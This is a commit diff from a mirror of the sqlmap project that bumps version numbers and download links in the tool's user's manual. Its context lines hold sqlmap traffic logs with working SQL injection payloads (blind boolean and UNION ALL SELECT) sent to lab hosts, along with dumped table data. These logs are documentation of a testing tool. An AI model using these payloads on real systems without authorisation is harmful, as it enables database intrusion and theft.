sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 01:26:42 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor updates to the user's manual, need still to write on new enhancements

Browse Source
This commit is contained in:
Bernardo Damele 2008-10-17 15:50:36 +00:00
parent 016118ce7a
commit fe6e29fbf6
3 changed files with 71 additions and 71 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
doc/README.html
View File

@ -8,7 +8,7 @@
<H1>sqlmap user's manual</H1>
<H2>by
<A HREF="mailto:bernardo.damele@gmail.com">Bernardo Damele A. G.</A></H2>version 0.6, 1st of September 2008
<A HREF="mailto:bernardo.damele@gmail.com">Bernardo Damele A. G.</A></H2>version 0.6.1, 20th of October 2008
<HR>
<EM>This document is the user's manual to use
<A HREF="http://sqlmap.sourceforge.net">sqlmap</A>.
@ -73,7 +73,7 @@ read specific files on the file system and much more.</P>
<A HREF="http://www.python.org">Python</A>,
a dynamic object-oriented interpreted programming language.
This makes the tool independent from the operating system since it only
requires the Python interpreter.
requires the Python interpreter version equal or above to 2.4.
The interpreter is freely downloadable from its
<A HREF="http://python.org/download/">official site</A>.
To make it even easier, many GNU/Linux distributions come out of the box
@ -292,19 +292,19 @@ It is available in various formats:</P>
<P>
<UL>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.gz">Source gzip compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.gz">Source gzip compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.bz2">Source bzip2 compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.bz2">Source bzip2 compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.zip">Source zip compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.zip">Source zip compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6-1_all.deb">DEB binary package</A> architecture independent for Debian and any
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1.1-1_all.deb">DEB binary package</A> architecture independent for Debian and any
other Debian derivated GNU/Linux distribution.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
other operating system that can install RPM packages.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
interpreter</B> to be installed on the operating system.</LI>
</UL>
</P>
@ -331,7 +331,7 @@ and
<PRE>
$ python sqlmap.py -h
sqlmap/0.6 coded by Bernardo Damele A. G. &lt;bernardo.damele@gmail.com>
sqlmap/0.6.1.1 coded by Bernardo Damele A. G. &lt;bernardo.damele@gmail.com>
and Daniele Bellucci &lt;daniele.bellucci@gmail.com>
Usage: sqlmap.py [options] {-u &lt;URL> | -g &lt;google dork> | -c &lt;config file>}
@ -528,7 +528,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:28] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:29] [INFO] testing MySQL
@ -537,7 +537,7 @@ Connection: close
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
</PRE>
@ -555,7 +555,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:32] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200):
@ -573,7 +573,7 @@ Content-Type: text/html
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200):
@ -600,7 +600,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:23] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200):
@ -625,7 +625,7 @@ Content-Type: text/html
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2851%29%2C%20
CHAR%2851%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%201855=1855&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:24] [TRAFFIC IN] HTTP response (OK - 200):
@ -742,7 +742,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;ca
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 1 \
-p user-agent --user-agent "sqlmap/0.6 (http://sqlmap.sourceforge.net)"
-p user-agent --user-agent "sqlmap/0.6.1 (http://sqlmap.sourceforge.net)"
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INFO] testing connection to the target url
@ -888,7 +888,7 @@ $ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" -v 3
[hh:mm:39] [TRAFFIC OUT] HTTP request:
GET /sqlmap/get_str.asp?name=luther HTTP/1.1
Host: 192.168.1.125:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ
Connection: close
@ -900,7 +900,7 @@ Connection: close
GET /sqlmap/get_str.asp?name=luther HTTP/1.1
Host: 192.168.1.125:80
Cookie: ASPSESSIONIDSABTRCAS=469
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic
@ -948,7 +948,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;ca
GET /sqlmap/pgsql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
Referer: http://www.google.com
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
</PRE>
@ -965,7 +965,7 @@ Connection: close
<P>
<BLOCKQUOTE><CODE>
<PRE>
sqlmap/0.6 (http://sqlmap.sourceforge.net)
sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
</PRE>
</CODE></BLOCKQUOTE>
</P>
@ -1051,7 +1051,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1&
GET /sqlmap/mysql/basic/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M=
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
@ -1068,7 +1068,7 @@ nonce="qcL9udlSBAA=f3b77da349fcfbf1a59ba37b21e291341159598f",
uri="/sqlmap/mysql/digest/get_int.php?id=1&amp;cat=2",
response="e1bf3738b4bbe04e197a12fb134e13a2", algorithm="MD5", qop=auth, nc=00000001,
cnonce="df1c0902c931b640"
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
</PRE>
@ -1193,7 +1193,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=
[hh:mm:50] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int_refresh.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
@ -1215,7 +1215,7 @@ Content-Type: text/html
[hh:mm:51] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int_refresh.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@ -1237,7 +1237,7 @@ Content-Type: text/html
[hh:mm:51] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int_refresh.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@ -1549,9 +1549,9 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;ca
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
[hh:mm:03] [INFO] query: @@VERSION
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
[hh:mm:08] [INFO] performed 1308 queries in 4 seconds
back-end DBMS: active fingerprint: Microsoft SQL Server 2000
@ -2064,7 +2064,7 @@ Table: users
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6 (http://sqlmap.sourceforge.net) | user agent header |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
</PRE>
@ -2118,7 +2118,7 @@ Table: users
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6 (http://sqlmap.sourceforge.net) | user agent header |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | | nameisnull |
+----+--------------------------------------------+-------------------+
@ -2132,7 +2132,7 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
"1","luther","blissett"
"2","fluffy","bunny"
"3","wu","ming"
"4","sqlmap/0.6 (http://sqlmap.sourceforge.net)","user agent header"
"4","sqlmap/0.6.1 (http://sqlmap.sourceforge.net)","user agent header"
"5","","nameisnull"
</PRE>
</CODE></BLOCKQUOTE>
@ -2159,7 +2159,7 @@ Table: users
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6 (http://sqlmap.sourceforge.net) | user agent header |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
@ -2249,7 +2249,7 @@ Table: users
+----+--------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
| 4 | sqlmap/0.6 (http://sqlmap.sourceforge.net) | user agent header |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 2 | fluffy | bunny |
| 1 | luther | blisset |
| 3 | wu | ming |
@ -2782,9 +2782,9 @@ CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</PRE>
</CODE></BLOCKQUOTE>
@ -2812,7 +2812,7 @@ GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28C
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
@ -2954,7 +2954,7 @@ $ python sqlmap.py --update -v 4
[hh:mm:55] [TRAFFIC OUT] HTTP request:
GET /doc/VERSION HTTP/1.1
Host: sqlmap.sourceforge.net
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200):
@ -2973,7 +2973,7 @@ X-Pad: avoid browser bug
[hh:mm:56] [TRAFFIC OUT] HTTP request:
GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1
Host: www.sqlsecurity.com
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0;
language=en-US
Connection: close

BIN
doc/README.pdf
View File

Binary file not shown.

64
doc/README.sgml
View File

@ -4,7 +4,7 @@
<title>sqlmap user's manual
<author>by <htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">
<date>version 0.6, 1st of September 2008
<date>version 0.6.1, 20th of October 2008
<abstract>
This document is the user's manual to use <htmlurl url="http://sqlmap.sourceforge.net" name="sqlmap">.
Check the project <htmlurl url="http://sqlmap.sourceforge.net" name="homepage">
@ -254,19 +254,19 @@ name="SourceForge File List page">.
It is available in various formats:
<itemize>
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.gz"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.gz"
name="Source gzip compressed"> operating system independent.
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.bz2"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.bz2"
name="Source bzip2 compressed"> operating system independent.
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.zip"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.zip"
name="Source zip compressed"> operating system independent.
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6-1_all.deb"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1.1-1_all.deb"
name="DEB binary package"> architecture independent for Debian and any
other Debian derivated GNU/Linux distribution.
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6-1.noarch.rpm"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1-1.noarch.rpm"
name="RPM binary package"> architecture independent for Fedora and any
other operating system that can install RPM packages.
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6_exe.zip"
<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1_exe.zip"
name="Portable executable for Windows"> that <bf>does not require the Python
interpreter</bf> to be installed on the operating system.
</itemize>
@ -294,7 +294,7 @@ and <htmlurl url="mailto:daniele.bellucci@gmail.com" name="Daniele Bellucci">.
<tscreen><verb>
$ python sqlmap.py -h
sqlmap/0.6 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
sqlmap/0.6.1.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
Usage: sqlmap.py [options] {-u <URL> | -g <google dork> | -c <config file>}
@ -486,7 +486,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:28] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:29] [INFO] testing MySQL
@ -495,7 +495,7 @@ Connection: close
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
</verb></tscreen>
@ -511,7 +511,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:32] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200):
@ -529,7 +529,7 @@ Content-Type: text/html
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200):
@ -554,7 +554,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:23] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200):
@ -579,7 +579,7 @@ Content-Type: text/html
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2851%29%2C%20
CHAR%2851%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%201855=1855&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:24] [TRAFFIC IN] HTTP response (OK - 200):
@ -694,7 +694,7 @@ Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 1 \
-p user-agent --user-agent "sqlmap/0.6 (http://sqlmap.sourceforge.net)"
-p user-agent --user-agent "sqlmap/0.6.1 (http://sqlmap.sourceforge.net)"
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INFO] testing connection to the target url
@ -839,7 +839,7 @@ $ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" -v 3
[hh:mm:39] [TRAFFIC OUT] HTTP request:
GET /sqlmap/get_str.asp?name=luther HTTP/1.1
Host: 192.168.1.125:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ
Connection: close
@ -851,7 +851,7 @@ Connection: close
GET /sqlmap/get_str.asp?name=luther HTTP/1.1
Host: 192.168.1.125:80
Cookie: ASPSESSIONIDSABTRCAS=469
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic
@ -898,7 +898,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;ca
GET /sqlmap/pgsql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
Referer: http://www.google.com
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
</verb></tscreen>
@ -914,7 +914,7 @@ By default sqlmap perform HTTP requests providing the following HTTP
<tt>User-Agent</tt> header value:
<tscreen><verb>
sqlmap/0.6 (http://sqlmap.sourceforge.net)
sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
</verb></tscreen>
<p>
@ -999,7 +999,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1&
GET /sqlmap/mysql/basic/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M=
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
@ -1016,7 +1016,7 @@ nonce="qcL9udlSBAA=f3b77da349fcfbf1a59ba37b21e291341159598f",
uri="/sqlmap/mysql/digest/get_int.php?id=1&amp;cat=2",
response="e1bf3738b4bbe04e197a12fb134e13a2", algorithm="MD5", qop=auth, nc=00000001,
cnonce="df1c0902c931b640"
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
</verb></tscreen>
@ -1138,7 +1138,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=
[hh:mm:50] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int_refresh.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
@ -1160,7 +1160,7 @@ Content-Type: text/html
[hh:mm:51] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int_refresh.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@ -1182,7 +1182,7 @@ Content-Type: text/html
[hh:mm:51] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int_refresh.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@ -2000,7 +2000,7 @@ Table: users
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6 (http://sqlmap.sourceforge.net) | user agent header |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
</verb></tscreen>
@ -2052,7 +2052,7 @@ Table: users
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6 (http://sqlmap.sourceforge.net) | user agent header |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | | nameisnull |
+----+--------------------------------------------+-------------------+
@ -2066,7 +2066,7 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
"1","luther","blissett"
"2","fluffy","bunny"
"3","wu","ming"
"4","sqlmap/0.6 (http://sqlmap.sourceforge.net)","user agent header"
"4","sqlmap/0.6.1 (http://sqlmap.sourceforge.net)","user agent header"
"5","","nameisnull"
</verb></tscreen>
@ -2093,7 +2093,7 @@ Table: users
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6 (http://sqlmap.sourceforge.net) | user agent header |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
@ -2182,7 +2182,7 @@ Table: users
+----+--------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
| 4 | sqlmap/0.6 (http://sqlmap.sourceforge.net) | user agent header |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 2 | fluffy | bunny |
| 1 | luther | blisset |
| 3 | wu | ming |
@ -2733,7 +2733,7 @@ GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28C
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
@ -2872,7 +2872,7 @@ $ python sqlmap.py --update -v 4
[hh:mm:55] [TRAFFIC OUT] HTTP request:
GET /doc/VERSION HTTP/1.1
Host: sqlmap.sourceforge.net
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200):
@ -2891,7 +2891,7 @@ X-Pad: avoid browser bug
[hh:mm:56] [TRAFFIC OUT] HTTP request:
GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1
Host: www.sqlsecurity.com
User-agent: sqlmap/0.6 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0;
language=en-US
Connection: close